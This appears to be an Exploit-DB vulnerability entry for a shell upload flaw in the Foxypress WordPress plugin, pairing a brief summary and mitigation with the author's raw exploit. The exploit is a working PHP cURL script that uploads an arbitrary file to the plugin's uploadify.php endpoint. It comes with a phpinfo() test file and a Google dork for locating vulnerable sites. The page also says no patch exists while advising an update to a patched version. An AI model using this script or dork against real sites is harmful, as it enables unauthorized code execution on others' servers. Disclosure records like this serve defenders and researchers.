Wordpress Plugins - Foxypress Shell Upload Vulnerability

vendor:

Wordpress

by:

Sammy FORGIT

7.5

CVSS

HIGH

Shell Upload

434

CWE

Product Name: Wordpress

Affected Version From: 0.4.1.1

Affected Version To: 0.4.2.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2012

WordPress Plugins – Foxypress Shell Upload Vulnerability

This vulnerability allows an attacker to upload arbitrary files to the target system using the Foxypress plugin for Wordpress. The exploit uses a specially crafted PHP file to upload a file named lo.php to the target system. The uploaded file can be used to execute arbitrary code on the target system.

Mitigation:

Update to a patched version of the Foxypress plugin or remove it from the system. Ensure that all plugins and themes used in Wordpress are regularly updated and come from trusted sources.

Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - Foxypress Shell Upload Vulnerability
# Version : 0.4.1.1 - 0.4.2.1
# Link : http://wordpress.org/extend/plugins/foxypress/
# Plugins : http://downloads.wordpress.org/plugin/foxypress.zip
# Date : 26-05-2012
# Google Dork : inurl:/wp-content/plugins/foxypress/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$ch = 
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/foxypress/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : $postResult output

lo.php
<?php
phpinfo();
?>